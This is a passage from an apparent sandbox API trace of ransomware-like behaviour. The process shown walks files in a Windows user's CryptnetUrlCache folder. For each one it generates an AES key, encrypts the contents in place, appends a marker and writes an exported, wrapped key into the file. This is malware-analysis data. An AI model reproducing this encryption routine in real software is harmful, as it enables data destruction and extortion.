dwFlags=0x1, phKey=0x29ab110 | out: phKey=0x29ab110*=0x3b8690) returned 1 [0144.924] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0144.925] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0144.925] ReadFile (in: hFile=0x198, lpBuffer=0x2760000, nNumberOfBytesToRead=0x1cf, lpNumberOfBytesRead=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ab120*=0x1cf, lpOverlapped=0x0) returned 1 [0144.925] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4250) returned 1 [0144.925] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ab118*=0x1cf, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ab118*=0x1d0) returned 1 [0144.925] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0144.925] WriteFile (in: hFile=0x198, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x1d0, lpNumberOfBytesWritten=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ab120*=0x1d0, lpOverlapped=0x0) returned 1 [0144.925] WriteFile (in: hFile=0x198, lpBuffer=0x29ab160*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab160*, lpNumberOfBytesWritten=0x29ab124*=0x6, lpOverlapped=0x0) returned 1 [0144.925] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ab130 | out: pbData=0x0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0144.925] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ab1b0, pdwDataLen=0x29ab130 | out: pbData=0x29ab1b0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0144.925] WriteFile (in: hFile=0x198, lpBuffer=0x29ab1b0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab1b0*, lpNumberOfBytesWritten=0x29ab124*=0x10c, lpOverlapped=0x0) returned 1 [0144.925] CloseHandle (hObject=0x198) returned 1 [0144.947] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0144.952] CryptDestroyKey (hKey=0x3b8690) returned 1 [0144.952] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0144.953] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0144.953] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0144.953] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_F2318F7AB33980A131A265454C39CA30", dwFileAttributes=0x80) returned 1 [0144.954] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_F2318F7AB33980A131A265454C39CA30" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\8059e9a0d314877e40fe93d8ccfb3c69_f2318f7ab33980a131a265454c39ca30"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x198 [0144.955] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab128 | out: lpFileSize=0x29ab128*=463) returned 1 [0144.955] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab138 | out: lpFileSize=0x29ab138*=463) returned 1 [0144.955] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0xad, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0144.955] ReadFile (in: hFile=0x198, lpBuffer=0x29ab188, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ab148, lpOverlapped=0x0 | out: lpBuffer=0x29ab188*, lpNumberOfBytesRead=0x29ab148*=0x19, lpOverlapped=0x0) returned 1 [0144.956] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0144.956] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ab110 | out: phKey=0x29ab110*=0x3b8690) returned 1 [0144.956] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0144.956] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0144.956] ReadFile (in: hFile=0x198, lpBuffer=0x2760000, nNumberOfBytesToRead=0x1cf, lpNumberOfBytesRead=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ab120*=0x1cf, lpOverlapped=0x0) returned 1 [0144.956] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4250) returned 1 [0144.956] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ab118*=0x1cf, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ab118*=0x1d0) returned 1 [0144.956] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0144.956] WriteFile (in: hFile=0x198, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x1d0, lpNumberOfBytesWritten=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ab120*=0x1d0, lpOverlapped=0x0) returned 1 [0144.956] WriteFile (in: hFile=0x198, lpBuffer=0x29ab160*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab160*, lpNumberOfBytesWritten=0x29ab124*=0x6, lpOverlapped=0x0) returned 1 [0144.956] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ab130 | out: pbData=0x0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0144.956] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ab1b0, pdwDataLen=0x29ab130 | out: pbData=0x29ab1b0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0144.956] WriteFile (in: hFile=0x198, lpBuffer=0x29ab1b0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab1b0*, lpNumberOfBytesWritten=0x29ab124*=0x10c, lpOverlapped=0x0) returned 1 [0144.957] CloseHandle (hObject=0x198) returned 1 [0144.973] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0144.977] CryptDestroyKey (hKey=0x3b8690) returned 1 [0144.977] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0144.978] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0144.978] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0144.978] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_F6E15778DC8E326895C606FBFA0392EB", dwFileAttributes=0x80) returned 1 [0144.979] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_F6E15778DC8E326895C606FBFA0392EB" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\8059e9a0d314877e40fe93d8ccfb3c69_f6e15778dc8e326895c606fbfa0392eb"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x198 [0144.979] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab128 | out: lpFileSize=0x29ab128*=463) returned 1 [0144.979] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab138 | out: lpFileSize=0x29ab138*=463) returned 1 [0144.979] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0xad, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0144.979] ReadFile (in: hFile=0x198, lpBuffer=0x29ab188, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ab148, lpOverlapped=0x0 | out: lpBuffer=0x29ab188*, lpNumberOfBytesRead=0x29ab148*=0x19, lpOverlapped=0x0) returned 1 [0144.980] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0144.980] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ab110 | out: phKey=0x29ab110*=0x3b8690) returned 1 [0144.980] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0144.980] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0144.980] ReadFile (in: hFile=0x198, lpBuffer=0x2760000, nNumberOfBytesToRead=0x1cf, lpNumberOfBytesRead=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ab120*=0x1cf, lpOverlapped=0x0) returned 1 [0144.981] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4250) returned 1 [0144.981] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ab118*=0x1cf, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ab118*=0x1d0) returned 1 [0144.981] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0144.981] WriteFile (in: hFile=0x198, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x1d0, lpNumberOfBytesWritten=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ab120*=0x1d0, lpOverlapped=0x0) returned 1 [0144.981] WriteFile (in: hFile=0x198, lpBuffer=0x29ab160*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab160*, lpNumberOfBytesWritten=0x29ab124*=0x6, lpOverlapped=0x0) returned 1 [0144.981] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ab130 | out: pbData=0x0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0144.981] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ab1b0, pdwDataLen=0x29ab130 | out: pbData=0x29ab1b0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0144.981] WriteFile (in: hFile=0x198, lpBuffer=0x29ab1b0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab1b0*, lpNumberOfBytesWritten=0x29ab124*=0x10c, lpOverlapped=0x0) returned 1 [0144.981] CloseHandle (hObject=0x198) returned 1 [0145.007] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0145.011] CryptDestroyKey (hKey=0x3b8690) returned 1 [0145.011] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0145.011] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0145.011] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0145.012] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\828298824EA5549947C17DDABF6871F5_0206EFBC540300C3BF0163CDBC3D7D56", dwFileAttributes=0x80) returned 1 [0145.012] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\828298824EA5549947C17DDABF6871F5_0206EFBC540300C3BF0163CDBC3D7D56" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\828298824ea5549947c17ddabf6871f5_0206efbc540300c3bf0163cdbc3d7d56"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x198 [0145.012] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab128 | out: lpFileSize=0x29ab128*=1390) returned 1 [0145.012] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab138 | out: lpFileSize=0x29ab138*=1390) returned 1 [0145.012] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x44c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0145.012] ReadFile (in: hFile=0x198, lpBuffer=0x29ab188, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ab148, lpOverlapped=0x0 | out: lpBuffer=0x29ab188*, lpNumberOfBytesRead=0x29ab148*=0x19, lpOverlapped=0x0) returned 1 [0145.013] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0145.013] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ab110 | out: phKey=0x29ab110*=0x3b8690) returned 1 [0145.013] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0145.014] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0145.014] ReadFile (in: hFile=0x198, lpBuffer=0x2760000, nNumberOfBytesToRead=0x56e, lpNumberOfBytesRead=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ab120*=0x56e, lpOverlapped=0x0) returned 1 [0145.014] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4250) returned 1 [0145.014] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ab118*=0x56e, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ab118*=0x570) returned 1 [0145.014] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0145.014] WriteFile (in: hFile=0x198, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x570, lpNumberOfBytesWritten=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ab120*=0x570, lpOverlapped=0x0) returned 1 [0145.014] WriteFile (in: hFile=0x198, lpBuffer=0x29ab160*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab160*, lpNumberOfBytesWritten=0x29ab124*=0x6, lpOverlapped=0x0) returned 1 [0145.014] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ab130 | out: pbData=0x0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0145.014] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ab1b0, pdwDataLen=0x29ab130 | out: pbData=0x29ab1b0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0145.014] WriteFile (in: hFile=0x198, lpBuffer=0x29ab1b0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab1b0*, lpNumberOfBytesWritten=0x29ab124*=0x10c, lpOverlapped=0x0) returned 1 [0145.014] CloseHandle (hObject=0x198) returned 1 [0145.030] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0145.034] CryptDestroyKey (hKey=0x3b8690) returned 1 [0145.034] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0145.035] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0145.035] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0145.035] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8828F39C7C0CE9A14B25C7EB321181BA_3DF94EB797096674F7793A562A778C5F", dwFileAttributes=0x80) returned 1 [0145.035] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8828F39C7C0CE9A14B25C7EB321181BA_3DF94EB797096674F7793A562A778C5F" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\8828f39c7c0ce9a14b25c7eb321181ba_3df94eb797096674f7793a562a778c5f"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x198 [0145.035] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab128 | out: lpFileSize=0x29ab128*=1763) returned 1 [0145.035] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab138 | out: lpFileSize=0x29ab138*=1763) returned 1 [0145.035] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x5c1, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0145.035] ReadFile (in: hFile=0x198, lpBuffer=0x29ab188, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ab148, lpOverlapped=0x0 | out: lpBuffer=0x29ab188*, lpNumberOfBytesRead=0x29ab148*=0x19, lpOverlapped=0x0) returned 1 [0145.037] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0145.037] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ab110 | out: phKey=0x29ab110*=0x3b8690) returned 1 [0145.037] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0145.037] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0145.037] ReadFile (in: hFile=0x198, lpBuffer=0x2760000, nNumberOfBytesToRead=0x6e3, lpNumberOfBytesRead=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ab120*=0x6e3, lpOverlapped=0x0) returned 1 [0145.037] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4250) returned 1 [0145.037] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ab118*=0x6e3, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ab118*=0x6f0) returned 1 [0145.037] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0145.037] WriteFile (in: hFile=0x198, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x6f0, lpNumberOfBytesWritten=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ab120*=0x6f0, lpOverlapped=0x0) returned 1 [0145.037] WriteFile (in: hFile=0x198, lpBuffer=0x29ab160*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab160*, lpNumberOfBytesWritten=0x29ab124*=0x6, lpOverlapped=0x0) returned 1 [0145.037] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ab130 | out: pbData=0x0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0145.037] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ab1b0, pdwDataLen=0x29ab130 | out: pbData=0x29ab1b0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0145.037] WriteFile (in: hFile=0x198, lpBuffer=0x29ab1b0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab1b0*, lpNumberOfBytesWritten=0x29ab124*=0x10c, lpOverlapped=0x0) returned 1 [0145.037] CloseHandle (hObject=0x198) returned 1 [0145.054] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0145.058] CryptDestroyKey (hKey=0x3b8690) returned 1 [0145.058] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0145.058] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0145.058] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0145.058] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8828F39C7C0CE9A14B25C7EB321181BA_C6EF73E4482B2588B1252D1A64B99416", dwFileAttributes=0x80) returned 1 [0145.060] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8828F39C7C0CE9A14B25C7EB321181BA_C6EF73E4482B2588B1252D1A64B99416" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\8828f39c7c0ce9a14b25c7eb321181ba_c6ef73e4482b2588b1252d1a64b99416"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x198 [0145.060] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab128 | out: lpFileSize=0x29ab128*=1763) returned 1 [0145.060] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab138 | out: lpFileSize=0x29ab138*=1763) returned 1 [0145.060] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x5c1, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0145.060] ReadFile (in: hFile=0x198, lpBuffer=0x29ab188, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ab148, lpOverlapped=0x0 | out: lpBuffer=0x29ab188*, lpNumberOfBytesRead=0x29ab148*=0x19, lpOverlapped=0x0) returned 1 [0145.061] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0145.061] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ab110 | out: phKey=0x29ab110*=0x3b8690) returned 1 [0145.061] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0145.061] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0145.061] ReadFile (in: hFile=0x198, lpBuffer=0x2760000, nNumberOfBytesToRead=0x6e3, lpNumberOfBytesRead=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ab120*=0x6e3, lpOverlapped=0x0) returned 1 [0145.061] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4250) returned 1 [0145.061] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ab118*=0x6e3, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ab118*=0x6f0) returned 1 [0145.061] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0145.061] WriteFile (in: hFile=0x198, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x6f0, lpNumberOfBytesWritten=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ab120*=0x6f0, lpOverlapped=0x0) returned 1 [0145.061] WriteFile (in: hFile=0x198, lpBuffer=0x29ab160*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab160*, lpNumberOfBytesWritten=0x29ab124*=0x6, lpOverlapped=0x0) returned 1 [0145.062] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ab130 | out: pbData=0x0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0145.062] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ab1b0, pdwDataLen=0x29ab130 | out: pbData=0x29ab1b0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0145.062] WriteFile (in: hFile=0x198, lpBuffer=0x29ab1b0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab1b0*, lpNumberOfBytesWritten=0x29ab124*=0x10c, lpOverlapped=0x0) returned 1 [0145.062] CloseHandle (hObject=0x198) returned 1 [0145.081] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0145.085] CryptDestroyKey (hKey=0x3b8690) returned 1 [0145.085] VirtualFree (lpAddress=0x350000, 